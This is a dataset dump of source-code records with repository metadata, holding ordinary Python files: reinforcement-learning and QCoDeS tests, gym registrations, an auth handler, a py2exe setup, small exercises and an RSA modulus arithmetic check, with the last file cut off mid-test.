hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b284e34183349b94655f2ba4c0ad549e6e0f8f3f
| 273
|
py
|
Python
|
dsfaker/generators/str.py
|
pajachiet/dsfaker
|
0e65ba336608c2ccc5e32a541f3b66dfad019b35
|
[
"MIT"
] | 3
|
2017-03-12T22:08:59.000Z
|
2017-05-22T16:57:17.000Z
|
dsfaker/generators/str.py
|
pajachiet/dsfaker
|
0e65ba336608c2ccc5e32a541f3b66dfad019b35
|
[
"MIT"
] | 12
|
2017-03-01T10:14:08.000Z
|
2017-04-23T12:15:10.000Z
|
dsfaker/generators/str.py
|
pajachiet/dsfaker
|
0e65ba336608c2ccc5e32a541f3b66dfad019b35
|
[
"MIT"
] | 2
|
2017-05-04T15:36:21.000Z
|
2018-02-07T13:49:13.000Z
|
from random import Random
from rstr import Rstr
from . import Generator
class Regex(Generator):
def __init__(self, regex, seed=None):
self.gen = Rstr(Random(seed))
self.regex = regex
def get_single(self):
return self.gen.xeger(self.regex)
| 22.75
| 41
| 0.677656
| 199
| 0.728938
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b285955d688db6c4b472e2c5faffe22749cd5bcf
| 7,081
|
py
|
Python
|
ssh/factorcheck.py
|
riquelmev/cs338
|
cdbff5e25b112a9fb2e039f59c0ebf036649ffd8
|
[
"MIT"
] | null | null | null |
ssh/factorcheck.py
|
riquelmev/cs338
|
cdbff5e25b112a9fb2e039f59c0ebf036649ffd8
|
[
"MIT"
] | null | null | null |
ssh/factorcheck.py
|
riquelmev/cs338
|
cdbff5e25b112a9fb2e039f59c0ebf036649ffd8
|
[
"MIT"
] | null | null | null |
import numpy
import math
print(math.lcm(0x00eca08bfa42dcad582302232a80813894fd2e4b842dca21eba465619a0d464a9f864ab2e9c0be42367d63c595e81385dcb66bbf8242cddb848969f883af2fbb8c1490a3932c03d15b2d7dfb08dd2c61e05978fbfd337e70ba838574cfe443658910aef9303e968d32351339c14a3c08920a5c1a854cea5af98bd32f1098a2fc5f8a468009c7c063f48c29a688bc485f580625883b8a13ff655d34a11f927ddcfadfdc25c9e318127a83e8fb48ada3f531a5160fc9849852e2e51cba9001cc18e4,
0x00d63e8c9986e6067792268a91b4b65721256fe5ff7de459f80348b882d67a024032e38d9dc3d12943e95f97c9efe381399f16697311ad2766ab98dbe08c30fcd312754bbeb344c88fa2f8ff7ce6ac36d68e4950dfd6599270cfa9b36cec3384323efe64731a69aedee1761104f65a6f84eab6806c90af902b7a24c422cf4673986eb7b18650de51b10109de23668e471354f543b2d05386f4aa44feaf00fe0e0ca8335ba9cd0a0cd7b44233fcec489a3217eb3da1d9b51c4d8e9ba40cfd6cb7aa))
print (( (65537 * 2943845207193600139849586921660530062979514836939652252911168510314905302166532845264906113584033646531012076406573806987025047457519902435411802267739360377120761697446091031629022721340581940013244671666962132695199042194704089512690548281464483553640422003142860526990759194808923501682158662399385088877090264964084503057490757632128265341366808789218428209326618760642760356184383281196480504761667539912421070047089521150757775831975677601090160692307767419292257798639731268363386233177395498370665722400495226560396671910091288741087409721516597979322885628216630331527097105539998928620712679031068142304793554336036922257467880853151468114731275288628988864368750827488439382991282564278525342098508917887127750683566587189942598936549588448717091038482697327056078134954278878301931522106687291086778640089700384840670406150969051320700177941289226071446754539534444766951378823161600415971105082067617171855980113)
% 2247039172418436668592154415151015126222786674452760187503368863970509536315956942465946330840400804713521295730929741305714657992353620380964165912192341731136307469898957232004091102824338674617377312450939870608493589894180315797731195699072185635394040726997130798478842130796557413577261032584072916023035927031809993907276633856706151009517313622397019910955492822225070876581131226412459152580542808796183783690613859162091921205452946458684438170181390092687592585015747357730389512738725469097581172245064706069050974691027868509488068610750445862693733466299013534093773154038841250698994256296984775707305557541589235662563155223305238362859813517247589601725306580259839877045186180003746975834031900204620211932784805784617611303338578827900908401922205156339089130334248484128507875195736838993177401998121291885662897832705086377879426528514698451483880180031084401254280385901954419537599741014039443185713588 == 1))
print((32**65537) % 2247039172418436668592154415151015126222786674452760187503368863970509536315956942465946330840400804713521295730929741305714657992353620380964165912192341731136307469898957232004091102824338674617377312450939870608493589894180315797731195699072185635394040726997130798478842130796557413577261032584072916023035927031809993907276633856706151009517313622397019910955492822225070876581131226412459152580542808796183783690613859162091921205452946458684438170181390092687592585015747357730389512738725469097581172245064706069050974691027868509488068610750445862693733466299013534093773154038841250698994256296984775707305557541589235662563155223305238362859813517247589601725306580259839877045186180003746975834031900204620211932784805784617611303338578827900908401922205156339089130334248484128507875195736838993177401998121291885662897832705086377879426528514698451483880180031084401254280385901954419537599741014039443185713588)
print(2943845207193600139849586921660530062979514836939652252911168510314905302166532845264906113584033646531012076406573806987025047457519902435411802267739360377120761697446091031629022721340581940013244671666962132695199042194704089512690548281464483553640422003142860526990759194808923501682158662399385088877090264964084503057490757632128265341366808789218428209326618760642760356184383281196480504761667539912421070047089521150757775831975677601090160692307767419292257798639731268363386233177395498370665722400495226560396671910091288741087409721516597979322885628216630331527097105539998928620712679031068142304793554336036922257467880853151468114731275288628988864368750827488439382991282564278525342098508917887127750683566587189942598936549588448717091038482697327056078134954278878301931522106687291086778640089700384840670406150969051320700177941289226071446754539534444766951378823161600415971105082067617171855980113%0x00eca08bfa42dcad582302232a80813894fd2e4b842dca21eba465619a0d464a9f864ab2e9c0be42367d63c595e81385dcb66bbf8242cddb848969f883af2fbb8c1490a3932c03d15b2d7dfb08dd2c61e05978fbfd337e70ba838574cfe443658910aef9303e968d32351339c14a3c08920a5c1a854cea5af98bd32f1098a2fc5f8a468009c7c063f48c29a688bc485f580625883b8a13ff655d34a11f927ddcfadfdc25c9e318127a83e8fb48ada3f531a5160fc9849852e2e51cba9001cc18e4
== 0x283f4a6fbfad9f424d7a10972b124f986fd3cefe65776afb9493b5dd2902dab0757c0120672b3541e563f1f88467c5adfbcd29deb31426914d7a1bcdf21f314c2b374acb3e824bbab16b2b269fcfebb9e81dfee65b3ad75bb201221436240c821ab758250f9035e5e34728dcaa8eb97a758ea2e82763f92356d80dba49ebf6f71d22cea65b366b09ee492b4d38912abe6315412db7579d6a15475d5c6c634211ddbfa921c4a1948b0822b992ec0de6279287c519a696ee0a2fa40a4b7232cfcd)
print(2943845207193600139849586921660530062979514836939652252911168510314905302166532845264906113584033646531012076406573806987025047457519902435411802267739360377120761697446091031629022721340581940013244671666962132695199042194704089512690548281464483553640422003142860526990759194808923501682158662399385088877090264964084503057490757632128265341366808789218428209326618760642760356184383281196480504761667539912421070047089521150757775831975677601090160692307767419292257798639731268363386233177395498370665722400495226560396671910091288741087409721516597979322885628216630331527097105539998928620712679031068142304793554336036922257467880853151468114731275288628988864368750827488439382991282564278525342098508917887127750683566587189942598936549588448717091038482697327056078134954278878301931522106687291086778640089700384840670406150969051320700177941289226071446754539534444766951378823161600415971105082067617171855980113%
0x00d63e8c9986e6067792268a91b4b65721256fe5ff7de459f80348b882d67a024032e38d9dc3d12943e95f97c9efe381399f16697311ad2766ab98dbe08c30fcd312754bbeb344c88fa2f8ff7ce6ac36d68e4950dfd6599270cfa9b36cec3384323efe64731a69aedee1761104f65a6f84eab6806c90af902b7a24c422cf4673986eb7b18650de51b10109de23668e471354f543b2d05386f4aa44feaf00fe0e0ca8335ba9cd0a0cd7b44233fcec489a3217eb3da1d9b51c4d8e9ba40cfd6cb7aa
== 0x47d9c4577cc94a23f1ace14e0a5818927236bbe0da7ca9bba6864df2fb3101ee3be2daccad2e49739021d20b145bad2c00f1883de210bb2510a97c1c2b880652575f651eb88a79e4ca184dbebab1c8d65df3b29ecf094d366e3e9081181a12dcb309a7f07e4c312c685aab4c89be3ca64bfd16c6d2233eeb85d42cbf2bda89cbf65dbeb8b8084747607cc9b5ff9ff9b03f0ede3c6ae7885c277a6a1b90eea311959b5bc36f934e494d17e2cd9104ac49de81b332c38b9cc959e952b4548d906f)
| 337.190476
| 1,320
| 0.990679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b286d23fc369a16764ed55694919ccd382975d06
| 138
|
py
|
Python
|
main1.py
|
dubblin27/bible-of-algo
|
4f893ba0d32d8d169abf4c4485f105cc8169cdbb
|
[
"MIT"
] | null | null | null |
main1.py
|
dubblin27/bible-of-algo
|
4f893ba0d32d8d169abf4c4485f105cc8169cdbb
|
[
"MIT"
] | null | null | null |
main1.py
|
dubblin27/bible-of-algo
|
4f893ba0d32d8d169abf4c4485f105cc8169cdbb
|
[
"MIT"
] | null | null | null |
su = 0
a = [3,5,6,2,7,1]
print(sum(a))
x, y = input("Enter a two value: ").split()
x = int(x)
y = int(y)
su = a[y] + sum(a[:y])
print(su)
| 17.25
| 44
| 0.514493
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 21
| 0.152174
|
b2887d26206a7158175689bb0d3fde0011f6d15d
| 8,099
|
py
|
Python
|
reagent/test/training/test_qrdqn.py
|
dmitryvinn/ReAgent
|
f98825b9d021ec353a1f9087840a05fea259bf42
|
[
"BSD-3-Clause"
] | 1,156
|
2019-10-02T12:15:31.000Z
|
2022-03-31T16:01:27.000Z
|
reagent/test/training/test_qrdqn.py
|
dmitryvinn/ReAgent
|
f98825b9d021ec353a1f9087840a05fea259bf42
|
[
"BSD-3-Clause"
] | 448
|
2019-10-03T13:40:52.000Z
|
2022-03-28T07:49:15.000Z
|
reagent/test/training/test_qrdqn.py
|
dmitryvinn/ReAgent
|
f98825b9d021ec353a1f9087840a05fea259bf42
|
[
"BSD-3-Clause"
] | 214
|
2019-10-13T13:28:33.000Z
|
2022-03-24T04:11:52.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import unittest
import torch
from reagent.core.parameters import EvaluationParameters, RLParameters
from reagent.core.types import FeatureData, DiscreteDqnInput, ExtraData
from reagent.evaluation.evaluator import get_metrics_to_score
from reagent.models.dqn import FullyConnectedDQN
from reagent.training.parameters import QRDQNTrainerParameters
from reagent.training.qrdqn_trainer import QRDQNTrainer
from reagent.workflow.types import RewardOptions
class TestQRDQN(unittest.TestCase):
def setUp(self):
# preparing various components for qr-dqn trainer initialization
self.params = QRDQNTrainerParameters(actions=["1", "2"], num_atoms=11)
self.reward_options = RewardOptions()
self.metrics_to_score = get_metrics_to_score(
self.reward_options.metric_reward_values
)
self.state_dim = 10
self.action_dim = 2
self.sizes = [20, 20]
self.num_atoms = 11
self.activations = ["relu", "relu"]
self.dropout_ratio = 0
self.q_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.action_dim,
sizes=self.sizes,
num_atoms=self.num_atoms,
activations=self.activations,
dropout_ratio=self.dropout_ratio,
)
self.q_network_target = self.q_network.get_target_network()
self.x = FeatureData(float_features=torch.rand(5, 10))
self.eval_parameters = EvaluationParameters(calc_cpe_in_training=True)
self.num_output_nodes = (len(self.metrics_to_score) + 1) * len(
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `actions`.
self.params.actions
)
self.reward_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe_target = self.q_network_cpe.get_target_network()
def _construct_trainer(self, new_params=None, no_cpe=False):
reward_network = self.reward_network
q_network_cpe = self.q_network_cpe
q_network_cpe_target = self.q_network_cpe_target
evaluation = self.eval_parameters
params = self.params
if new_params is not None:
params = new_params
if no_cpe:
reward_network = q_network_cpe = q_network_cpe_target = None
evaluation = EvaluationParameters(calc_cpe_in_training=False)
return QRDQNTrainer(
q_network=self.q_network,
q_network_target=self.q_network_target,
reward_network=reward_network,
q_network_cpe=q_network_cpe,
q_network_cpe_target=q_network_cpe_target,
metrics_to_score=self.metrics_to_score,
evaluation=evaluation,
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `asdict`.
**params.asdict()
)
def test_init(self):
trainer = self._construct_trainer()
quantiles = (0.5 + torch.arange(self.num_atoms).float()) / float(self.num_atoms)
self.assertTrue((torch.isclose(trainer.quantiles, quantiles)).all())
self.assertTrue((torch.isclose(trainer.reward_boosts, torch.zeros(2))).all())
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(reward_boost={"1": 1, "2": 2}),
)
reward_boost_trainer = self._construct_trainer(new_params=param_copy)
self.assertTrue(
(
torch.isclose(
reward_boost_trainer.reward_boosts, torch.tensor([1.0, 2.0])
)
).all()
)
def test_train_step_gen(self):
inp = DiscreteDqnInput(
state=FeatureData(float_features=torch.rand(3, 10)),
next_state=FeatureData(float_features=torch.rand(3, 10)),
reward=torch.ones(3, 1),
time_diff=torch.ones(3, 1) * 2,
step=torch.ones(3, 1) * 2,
not_terminal=torch.ones(3, 1), # todo: check terminal behavior
action=torch.tensor([[0, 1], [1, 0], [0, 1]]),
next_action=torch.tensor([[1, 0], [0, 1], [1, 0]]),
possible_actions_mask=torch.ones(3, 2),
possible_next_actions_mask=torch.ones(3, 2),
extras=ExtraData(),
)
mse_backward_type = type(
torch.nn.functional.mse_loss(
torch.tensor([1.0], requires_grad=True), torch.zeros(1)
).grad_fn
)
add_backward_type = type(
(
torch.tensor([1.0], requires_grad=True)
+ torch.tensor([1.0], requires_grad=True)
).grad_fn
)
mean_backward_type = type(
torch.tensor([1.0, 2.0], requires_grad=True).mean().grad_fn
)
# vanilla
trainer = self._construct_trainer()
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
self.assertEqual(type(losses[0].grad_fn), mean_backward_type)
self.assertEqual(type(losses[1].grad_fn), mse_backward_type)
self.assertEqual(type(losses[2].grad_fn), mse_backward_type)
self.assertEqual(type(losses[3].grad_fn), add_backward_type)
# no CPE
trainer = self._construct_trainer(no_cpe=True)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 2)
# seq_num
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(use_seq_num_diff_as_time_diff=True),
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# multi_steps
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(multi_steps=2)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# non_max_q
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(maxq_learning=False)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
def test_configure_optimizers(self):
trainer = self._construct_trainer()
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 4)
train_step_yield_order = [
trainer.q_network,
trainer.reward_network,
trainer.q_network_cpe,
trainer.q_network,
]
for i in range(len(train_step_yield_order)):
opt_param = optimizers[i]["optimizer"].param_groups[0]["params"][0]
loss_param = list(train_step_yield_order[i].parameters())[0]
self.assertTrue(torch.all(torch.isclose(opt_param, loss_param)))
trainer = self._construct_trainer(no_cpe=True)
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 2)
def test_get_detached_model_outputs(self):
trainer = self._construct_trainer()
q_out, q_target = trainer.get_detached_model_outputs(self.x)
self.assertEqual(q_out.shape[0], q_target.shape[0], 3)
self.assertEqual(q_out.shape[1], q_target.shape[1], 2)
| 40.293532
| 88
| 0.633782
| 7,548
| 0.931967
| 0
| 0
| 0
| 0
| 0
| 0
| 444
| 0.054822
|
b28976d7d07ee0d85891e3ce1f95a592baa06a72
| 717
|
py
|
Python
|
highway_env/__init__.py
|
songanz/highway-env
|
ac21d1da25e224dbdbf8ba39509f4013bd029f52
|
[
"MIT"
] | 1
|
2019-11-06T15:28:27.000Z
|
2019-11-06T15:28:27.000Z
|
highway_env/__init__.py
|
songanz/highway-env
|
ac21d1da25e224dbdbf8ba39509f4013bd029f52
|
[
"MIT"
] | null | null | null |
highway_env/__init__.py
|
songanz/highway-env
|
ac21d1da25e224dbdbf8ba39509f4013bd029f52
|
[
"MIT"
] | 1
|
2019-07-22T03:37:09.000Z
|
2019-07-22T03:37:09.000Z
|
from gym.envs.registration import register
register(
id='highway-v0',
entry_point='highway_env.envs:HighwayEnv',
)
register(
id='highway-continuous-v0',
entry_point='highway_env.envs:HighwayEnvCon',
)
register(
id='highway-continuous-intrinsic-rew-v0',
entry_point='highway_env.envs:HighwayEnvCon_intrinsic_rew',
)
register(
id='merge-v0',
entry_point='highway_env.envs:MergeEnv',
)
register(
id='roundabout-v0',
entry_point='highway_env.envs:RoundaboutEnv',
)
register(
id='two-way-v0',
entry_point='highway_env.envs:TwoWayEnv',
max_episode_steps=15
)
register(
id='parking-v0',
entry_point='highway_env.envs:ParkingEnv',
max_episode_steps=20
)
| 18.384615
| 63
| 0.714086
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 344
| 0.479777
|
b28b3da62fcf1d7ad1f84230a298ab9d0ed79266
| 700
|
py
|
Python
|
twitcaspy/auth/app.py
|
Alma-field/twitcaspy
|
25f3e850f2d5aab8a864bd6b7003468587fa3ea7
|
[
"MIT"
] | null | null | null |
twitcaspy/auth/app.py
|
Alma-field/twitcaspy
|
25f3e850f2d5aab8a864bd6b7003468587fa3ea7
|
[
"MIT"
] | 18
|
2021-10-01T13:40:01.000Z
|
2021-10-18T12:34:57.000Z
|
twitcaspy/auth/app.py
|
Alma-field/twitcaspy
|
25f3e850f2d5aab8a864bd6b7003468587fa3ea7
|
[
"MIT"
] | null | null | null |
# Twitcaspy
# Copyright 2021 Alma-field
# See LICENSE for details.
#
# based on tweepy(https://github.com/tweepy/tweepy)
# Copyright (c) 2009-2021 Joshua Roesslein
from .auth import AuthHandler
from .oauth import OAuth2Basic
class AppAuthHandler(AuthHandler):
"""
Application-only authentication handler
Parameters
----------
client_id: :class:`str`
|client_id|
client_secret: :class:`str`
|client_secret|
References
----------
https://apiv2-doc.twitcasting.tv/#access-token
"""
def __init__(self, client_id, client_secret):
super().__init__(client_id, client_secret)
self.auth = OAuth2Basic(client_id, client_secret)
| 22.580645
| 57
| 0.671429
| 471
| 0.672857
| 0
| 0
| 0
| 0
| 0
| 0
| 430
| 0.614286
|
b28b8885604c48606cb8d4e162a310c2bb979435
| 1,005
|
py
|
Python
|
tests/test_topic_matching.py
|
InfraPixels/powerlibs-aws-sqs-dequeue_to_api
|
67ae744c96c7658229acc6fd1b1c432d24f0817d
|
[
"MIT"
] | null | null | null |
tests/test_topic_matching.py
|
InfraPixels/powerlibs-aws-sqs-dequeue_to_api
|
67ae744c96c7658229acc6fd1b1c432d24f0817d
|
[
"MIT"
] | null | null | null |
tests/test_topic_matching.py
|
InfraPixels/powerlibs-aws-sqs-dequeue_to_api
|
67ae744c96c7658229acc6fd1b1c432d24f0817d
|
[
"MIT"
] | 1
|
2021-05-26T00:16:26.000Z
|
2021-05-26T00:16:26.000Z
|
def test_topic_regexp_matching(dequeuer):
msg = {'company_name': 'test_company'}
actions_1 = tuple(dequeuer.get_actions_for_topic('object__created', msg))
actions_2 = tuple(dequeuer.get_actions_for_topic('object__deleted', msg))
actions_3 = tuple(dequeuer.get_actions_for_topic('otherthing__created', msg))
assert actions_1 == actions_2
assert actions_1 != actions_3
def test_topic_regexp_matching_with_groups(dequeuer):
msg = {'company_name': 'test_company'}
actions_1 = tuple(dequeuer.get_actions_for_topic('step__alfa__started', msg))
payload = actions_1[0][1]['run'].args[2][0]
assert 'name' in payload
assert payload['name'] == 'alfa'
assert 'status' in payload
assert payload['status'] == 'started', payload
actions_2 = tuple(dequeuer.get_actions_for_topic('step__beta__finished', msg))
actions_3 = tuple(dequeuer.get_actions_for_topic('otherthing__created', msg))
assert actions_1 == actions_2
assert actions_1 != actions_3
| 38.653846
| 82
| 0.736318
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 223
| 0.221891
|
b28d0dae8fb9ed9ee50b81bbf1aae13554854cbe
| 1,352
|
py
|
Python
|
src/baskerville/models/model_interface.py
|
deflect-ca/baskerville
|
9659f4b39ab66fcf5329a4eccff15e97245b04f0
|
[
"CC-BY-4.0"
] | 2
|
2021-12-03T11:26:38.000Z
|
2022-01-12T22:24:29.000Z
|
src/baskerville/models/model_interface.py
|
deflect-ca/baskerville
|
9659f4b39ab66fcf5329a4eccff15e97245b04f0
|
[
"CC-BY-4.0"
] | 3
|
2022-01-19T15:17:37.000Z
|
2022-03-22T04:55:22.000Z
|
src/baskerville/models/model_interface.py
|
deflect-ca/baskerville
|
9659f4b39ab66fcf5329a4eccff15e97245b04f0
|
[
"CC-BY-4.0"
] | null | null | null |
# Copyright (c) 2020, eQualit.ie inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import inspect
import logging
class ModelInterface(object):
def __init__(self):
super().__init__()
self.logger = logging.getLogger(self.__class__.__name__)
def get_param_names(self):
return list(inspect.signature(self.__init__).parameters.keys())
def set_params(self, **params):
param_names = self.get_param_names()
for key, value in params.items():
if key not in param_names:
raise RuntimeError(
f'Class {self.__class__.__name__} does not '
f'have {key} attribute')
setattr(self, key, value)
def get_params(self):
params = {}
for name in self.get_param_names():
params[name] = getattr(self, name)
return params
def _get_class_path(self):
return f'{self.__class__.__module__}.{self.__class__.__name__}'
def train(self, df):
pass
def predict(self, df):
pass
def save(self, path, spark_session=None):
pass
def load(self, path, spark_session=None):
pass
def set_logger(self, logger):
self.logger = logger
| 26
| 71
| 0.621302
| 1,124
| 0.831361
| 0
| 0
| 0
| 0
| 0
| 0
| 311
| 0.23003
|
b28d6cf5837de54ecfea09556ec7ac0f5538da24
| 2,253
|
py
|
Python
|
setup_win(MPL2).py
|
iefan/army_holiday
|
0c79cf89c4dbb16bd87ca754265821f82b298f13
|
[
"Apache-2.0"
] | null | null | null |
setup_win(MPL2).py
|
iefan/army_holiday
|
0c79cf89c4dbb16bd87ca754265821f82b298f13
|
[
"Apache-2.0"
] | null | null | null |
setup_win(MPL2).py
|
iefan/army_holiday
|
0c79cf89c4dbb16bd87ca754265821f82b298f13
|
[
"Apache-2.0"
] | null | null | null |
# Used successfully in Python2.5 with matplotlib 0.91.2 and PyQt4 (and Qt 4.3.3)
from distutils.core import setup
import py2exe
import sys
# no arguments
if len(sys.argv) == 1:
sys.argv.append("py2exe")
# We need to import the glob module to search for all files.
import glob
# We need to exclude matplotlib backends not being used by this executable. You may find
# that you need different excludes to create a working executable with your chosen backend.
# We also need to include include various numerix libraries that the other functions call.
opts = {
'py2exe': { "includes" : ["matplotlib.backends", "matplotlib.backends.backend_qt4agg",
"matplotlib.figure","pylab", "numpy", "matplotlib.numerix.fft",
"matplotlib.numerix.linear_algebra", "matplotlib.numerix.random_array",
"matplotlib.backends.backend_tkagg"],
'excludes': ['_gtkagg', '_tkagg', '_agg2', '_cairo', '_cocoaagg',
'_fltkagg', '_gtk', '_gtkcairo', ],
'dll_excludes': ['libgdk-win32-2.0-0.dll',
'libgobject-2.0-0.dll'],
"compressed": 1,
}
}
# Save matplotlib-data to mpl-data ( It is located in the matplotlib\mpl-data
# folder and the compiled programs will look for it in \mpl-data
# note: using matplotlib.get_mpldata_info
data_files = [(r'mpl-data', glob.glob(r'C:\Python25\Lib\site-packages\matplotlib\mpl-data\*.*')),
# Because matplotlibrc does not have an extension, glob does not find it (at least I think that's why)
# So add it manually here:
(r'mpl-data', [r'C:\Python25\Lib\site-packages\matplotlib\mpl-data\matplotlibrc']),
(r'mpl-data\images',glob.glob(r'C:\Python25\Lib\site-packages\matplotlib\mpl-data\images\*.*')),
(r'mpl-data\fonts',glob.glob(r'C:\Python25\Lib\site-packages\matplotlib\mpl-data\fonts\*.*'))]
# for console program use 'console = [{"script" : "scriptname.py"}]
setup(windows=[{"script" : "frmlogin.pyw", "icon_resources": [(0, "bitmap/PHRLogo.ico")]}], options=opts, \
zipfile = None, data_files=data_files)
| 51.204545
| 122
| 0.625388
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,557
| 0.691079
|
b28f9f150dd905146af9d33f4c81aae2c96483db
| 1,529
|
py
|
Python
|
GeeksForGeeks/Sudo Placement 2019/Find the closest number.py
|
nayanapardhekar/Python
|
55ea0cc1dd69192b25cb71358cd03cc2ce13be0a
|
[
"MIT"
] | 37
|
2019-04-03T07:19:57.000Z
|
2022-01-09T06:18:41.000Z
|
GeeksForGeeks/Sudo Placement 2019/Find the closest number.py
|
nayanapardhekar/Python
|
55ea0cc1dd69192b25cb71358cd03cc2ce13be0a
|
[
"MIT"
] | 16
|
2020-08-11T08:09:42.000Z
|
2021-10-30T17:40:48.000Z
|
GeeksForGeeks/Sudo Placement 2019/Find the closest number.py
|
nayanapardhekar/Python
|
55ea0cc1dd69192b25cb71358cd03cc2ce13be0a
|
[
"MIT"
] | 130
|
2019-10-02T14:40:20.000Z
|
2022-01-26T17:38:26.000Z
|
# Find the closest number
# Difficulty: Basic Marks: 1
'''
Given an array of sorted integers. The task is to find the closest value to the given number in array. Array may contain duplicate values.
Note: If the difference is same for two values print the value which is greater than the given number.
Input:
The first line of input contains an integer T denoting the number of test cases. Then T test cases follow. Each test case consists of two lines. First line of each test case contains two integers N & K and the second line contains N space separated array elements.
Output:
For each test case, print the closest number in new line.
Constraints:
1<=T<=100
1<=N<=105
1<=K<=105
1<=A[i]<=105
Example:
Input:
2
4 4
1 3 6 7
7 4
1 2 3 5 6 8 9
Output:
3
5
'''
for _ in range(int(input())):
n1,n2=map(int,input().split())
a=list(map(int,input().split()))
a.append(n2)
a.sort()
for i in range(len(a)):
if a[-1]==n2:
print(a[-2])
break
else:
if a[i]==n2:
if a[i+1]==n2:
print(n2)
break
else:
if abs(n2-a[i+1])==abs(n2-a[i-1]):
print(a[i+1])
break
else:
if abs(n2-a[i+1])>abs(n2-a[i-1]):
print(a[i-1])
break
else:
print(a[i+1])
break
| 26.824561
| 264
| 0.517986
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 766
| 0.500327
|
b2910846552317313e27d4630f9b125c62fc3263
| 4,391
|
py
|
Python
|
qcodes/tests/test_sweep_values.py
|
riju-pal/QCoDeS_riju
|
816e76809160e9af457f6ef6d4aca1b0dd5eea82
|
[
"MIT"
] | 223
|
2016-10-29T15:00:24.000Z
|
2022-03-20T06:53:34.000Z
|
qcodes/tests/test_sweep_values.py
|
M1racleShih/Qcodes
|
c03029a6968e16379155aadc8b083a02e01876a6
|
[
"MIT"
] | 3,406
|
2016-10-25T10:44:50.000Z
|
2022-03-31T09:47:35.000Z
|
qcodes/tests/test_sweep_values.py
|
nikhartman/Qcodes
|
042c5e25ab9e40b20c316b4055c4842844834d1e
|
[
"MIT"
] | 263
|
2016-10-25T11:35:36.000Z
|
2022-03-31T08:53:20.000Z
|
import pytest
from qcodes.instrument.parameter import Parameter
from qcodes.instrument.sweep_values import SweepValues
from qcodes.utils.validators import Numbers
@pytest.fixture(name='c0')
def _make_c0():
c0 = Parameter('c0', vals=Numbers(-10, 10), get_cmd=None, set_cmd=None)
yield c0
@pytest.fixture(name='c1')
def _make_c1():
c1 = Parameter('c1', get_cmd=None, set_cmd=None)
yield c1
@pytest.fixture(name='c2')
def _make_c2():
c2 = Parameter('c2', get_cmd=lambda: 42)
yield c2
def test_errors(c0, c1, c2):
# only complete 3-part slices are valid
with pytest.raises(TypeError):
c0[1:2] # For Int params this could be defined as step=1
with pytest.raises(TypeError):
c0[:2:3]
with pytest.raises(TypeError):
c0[1::3]
with pytest.raises(TypeError):
c0[:] # For Enum params we *could* define this one too...
# fails if the parameter has no setter
with pytest.raises(TypeError):
c2[0:0.1:0.01]
# validates every step value against the parameter's Validator
with pytest.raises(ValueError):
